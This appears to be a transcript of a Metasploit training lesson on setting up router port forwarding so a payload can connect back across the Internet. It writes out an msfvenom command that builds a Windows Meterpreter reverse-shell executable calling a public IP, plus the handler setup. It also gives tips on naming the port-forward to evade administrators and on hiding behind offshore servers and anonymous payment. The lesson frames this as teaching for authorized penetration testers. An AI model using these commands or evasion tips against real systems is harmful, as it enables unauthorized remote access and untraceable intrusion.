Welcome to part seven of this module. It's time to talk about port forwarding. Up until now, all of these demonstrations have been assuming that you are conducting your activities with Metasploit on the same network as your target or targets. I can imagine this may have been frustrating to some of you, who might be thinking this whole technique is useless as a form of remote penetration testing. But fear not. All we really need to do is set up port forwarding on our router. Once this is done, we'll be able to set up our payloads using our real IP address instead of our network IP. When the payload sends a signal to our IP and the port that we specify, the router is going to forward that connection directly to the computer that we're running Metasploit on. Depending on your background, what I just said might seem very cut and dry or terribly confusing, so for the benefit of the less experienced, I will elaborate. Until now, we've been using network IP addresses in everything that we've been doing in the videos. This has looked like 10.0.0.3 or 10.0.0.20, or whatever your own network IPs might look like. Or perhaps they look like 192.0.0.8 or something of that nature. Regardless of how your network configuration is set up, these are local addresses.
If you were not connected to the same router, the address 10.0.0.3 would have a completely different meaning. You would not be able, for example, to hack into a computer on your home network if you are connected to your office network. You need to use the public IP address that corresponds to your router if you want things to perform over the Internet. This is where port forwarding comes into play. Let's say that our public IP address is 72.126.7.186 and our network address is going to be 10.0.0.6. This is just an example. If we want our payload to open up a Meterpreter session across the Internet, say, again, from our home computer to our office computer or vice versa, we need to give the payload the IP address 72.126.7.186, which in this example is our public IP. Then the payload is going to try to connect to our router using whatever port we specified when we set up the payload, which in our previous example was, I believe, 444. Without port forwarding being set up, our router is just going to look at that request for a connection and go "nope". It will reject it, or more accurately, it just won't go anywhere. All we have to do is go into our router settings and tell our router to send any connections coming in on port 444 to our Metasploit computer, which again in this example is going to be 10.0.0.6.
Unfortunately, every single router out there is different. The technique for doing this is going to be similar, but obviously I can't show this process for every different router brand in existence. You may have to do a little research on your own and look up the router brand for specific instructions if you aren't able to readily spot the port forwarding tab in your advanced settings. Because it is an extremely common router, I'm going to be using a Comcast Xfinity gateway for this demonstration. This is the combination modem/Wi-Fi router that most customers lease from Comcast as part of their internet package. Please understand that I am not endorsing this router choice or this service; I chose it because it is highly common in my area of the world and should make for a suitable demonstration. So we're going to open up our browser of choice, and we need to navigate to our router using the network IP address of the router. In this case that's going to be http://10.0.0.1, and this should bring us to the router login page. Now again, yours might be slightly different. For example, it might be 192.0.0.1. Please look up the individual router brand and look up instructions on how to log in if you have any problems; it shouldn't be too difficult.
At any rate, once you put in the router's IP address, you should be presented with a page that looks something like this. These are the required login credentials to access your router. If you've changed these, you'll need to supply whatever username and password that you set. If you did not change them, then they should be the default, and the default is going to vary from router to router. In this case it's going to be admin for the username and password, all lowercase, for the password. Some routers have admin/admin or something like that; again, finding the default login for your router brand should be as easy as a single Internet search. But if you set the password and now you can't remember that password, you may need to perform a router reset, but doing so is outside of the scope of this particular tutorial. Once logged into the gateway, we can now adjust the settings. So the first thing that we need to do is click on this Advanced tab and click on Port Forwarding, and then we need to make sure that port forwarding is enabled and that this button appears in green. If the Disabled button appears in red and Enabled is not green, we need to press the Enabled button to allow port forwarding. Once we're very sure that port forwarding is enabled, we can come over here to the Add Services button and click on it.
After doing that, we're going to be brought to a page that looks like this. Again, the exact appearance and layout will vary from router to router, but it shouldn't be wildly different. Now, I want to point out that we're going to have the option to specify what service we want to set up in this first drop-down menu. This is good to know, of course, but for our purposes right now we will be just fine leaving the selection as Other. Under the service name, you can call it whatever you want. In this demonstration I'll be using "metasploit", but if you were setting this up on an office router or something as part of a penetration test, you'd probably want to give it a more legitimate-sounding name. A good system administrator is going to spot it regardless, as any admin worth their salt should know exactly which port forwarding exceptions exist on their own network, but unless security is tight it's not likely to be checked all that often, so it may evade notice for a little while. For the service type, we have the option of both TCP and UDP, TCP, or UDP. Again, for our purposes, we'll just set it to both TCP and UDP. Now, this next step is actually the most important. We need to specify the network address of our Metasploit machine.
If you don't know what this is, just type ifconfig. In this case it's going to be 10.0.0.6; yours will vary. If you're on a Windows PC, the command would be ipconfig, by the way. And if all else fails, you can always go over to the connected devices on your router, spot the PC that you want to use, and get the IP that way. So what this does is it tells the router that any incoming connections on the specified ports are going to be forwarded directly to our Metasploit machine at that specific network address. If we do this wrong, the incoming connections simply won't reach where we want them to go. Finally, we have the option to specify a range of ports that we wish forwarded. We could, for example, type 4000 as the starting port and 5000 as the end port. This would mean that any connection using ports 4000 to 5000, or anything in between, would be forwarded. We can also specify a specific port, in this case 444, by filling that into both of the boxes, assuming of course that that's the port we're choosing to use for our Metasploit payloads. Now, I should add that some router brands, particularly older brands, will require you to set each individual port exception one at a time; you may not have a start port and an end port option. Once done, click the Add button and you should see your newly created exception in the list.
Now we'll flip back to msfconsole and we'll go ahead and create a payload using msfvenom exactly as we did before, to create a Meterpreter reverse TCP session with the target that we wish to hack. The procedure is exactly the same, except that instead of supplying our network IP we will be supplying our public IP. The command structure should look pretty familiar by now, but I'll walk us through it: msfvenom -p windows/meterpreter/reverse_tcp LHOST= our public IP address, 73.15.69.169, and our LPORT is going to remain 444, -f exe > /root/Desktop/ (you can of course create this wherever you wish) and I'm going to call this forwarded.exe. This will generate the new payload, which I've named forwarded.exe for this demonstration, and place it on our desktop. Again, you've seen this all before. The only difference in this step is that for the LHOST, instead of using 10.0.0.6, we used our public IP address, which has created our new payload here on the desktop. So once we've done that, we need to set up our exploit settings, so we're gonna do use multi/handler, and there's going to be a slight difference in this process. Again, we're going to set the LHOST to our public IP (whoops) as opposed to our network IP.
I think LHOST has to be capitalized. And we'll set the LPORT; keep it the same. You can set it to whatever you wish. Show options. Very good, and then we would type exploit. And then once the payload is run, the session will open as normal, even if the target is on a different network a thousand miles away. OK. So why is this a really bad idea? Well, the payload is going to send a connection directly to the public IP address that you give it. This means that a network administrator, or even the person using the infected computer, could potentially detect the open connection and trace it directly to you. Your Internet service provider sees and logs all unencrypted traffic going to and from your computer. This means that if you use your home IP address, the connection can be traced right back to you, and your ISP will have a log of everything it did that it can provide to the authorities. Even for someone who is doing a lawful penetration test and has written permission to show the authorities, who has dotted every i and crossed every t, this can still be quite a headache. Black hat hackers therefore do not use their own home IP address. They perform their hacking activities from coffee shops or hacked networks that they have no personal connection to.
That doesn't relate to their identity, or, more commonly, through proxies. A common technique for a hacker would be to purchase a small virtual private server in a foreign country. So-called bulletproof hosting are servers in countries outside of the hacker's jurisdiction that are unlikely to cooperate with the demands of the hacker's home country. For example, a hacker in the United States might purchase a virtual private server in Russia, with the idea that the Russian government is unlikely to force the company to hand over any records to the United States government, given the relationship between the two nation states. In any case, the hacker would make their connection to the service through the use of a virtual private network, or Tor, or a proxy chain, or something like that, all of which we will be covering in an upcoming module. They would pay using some anonymous method, possibly Bitcoin or another cryptocurrency, which many of these services actually facilitate and encourage. Once the private server is up and running, the hacker then uses it as a proxy, connecting to it from an encrypted connection such as a VPN. As has been said, Metasploit is run on the server rather than the home computer, so any attempt to trace the IP would lead to the virtual private server, in this case the proxy. This is but one method that hackers use to cover their tracks.
All of this will be discussed at greater length soon, and the subject of virtual private servers will be elaborated on more when we get to botnets. For now, just keep it in the back of your mind that using our home IP address, even for lawful activities, is really a very bad idea and is likely to cause you many headaches. As always, be lawful. Never use anything shown in this video or any other video against any target that you do not have written permission from the owner to penetration test. Be aware of the laws of your area and your country and follow them at all times. Next we'll look at some additional payload types before moving on to Armitage. Thank you, and I'll see you next time.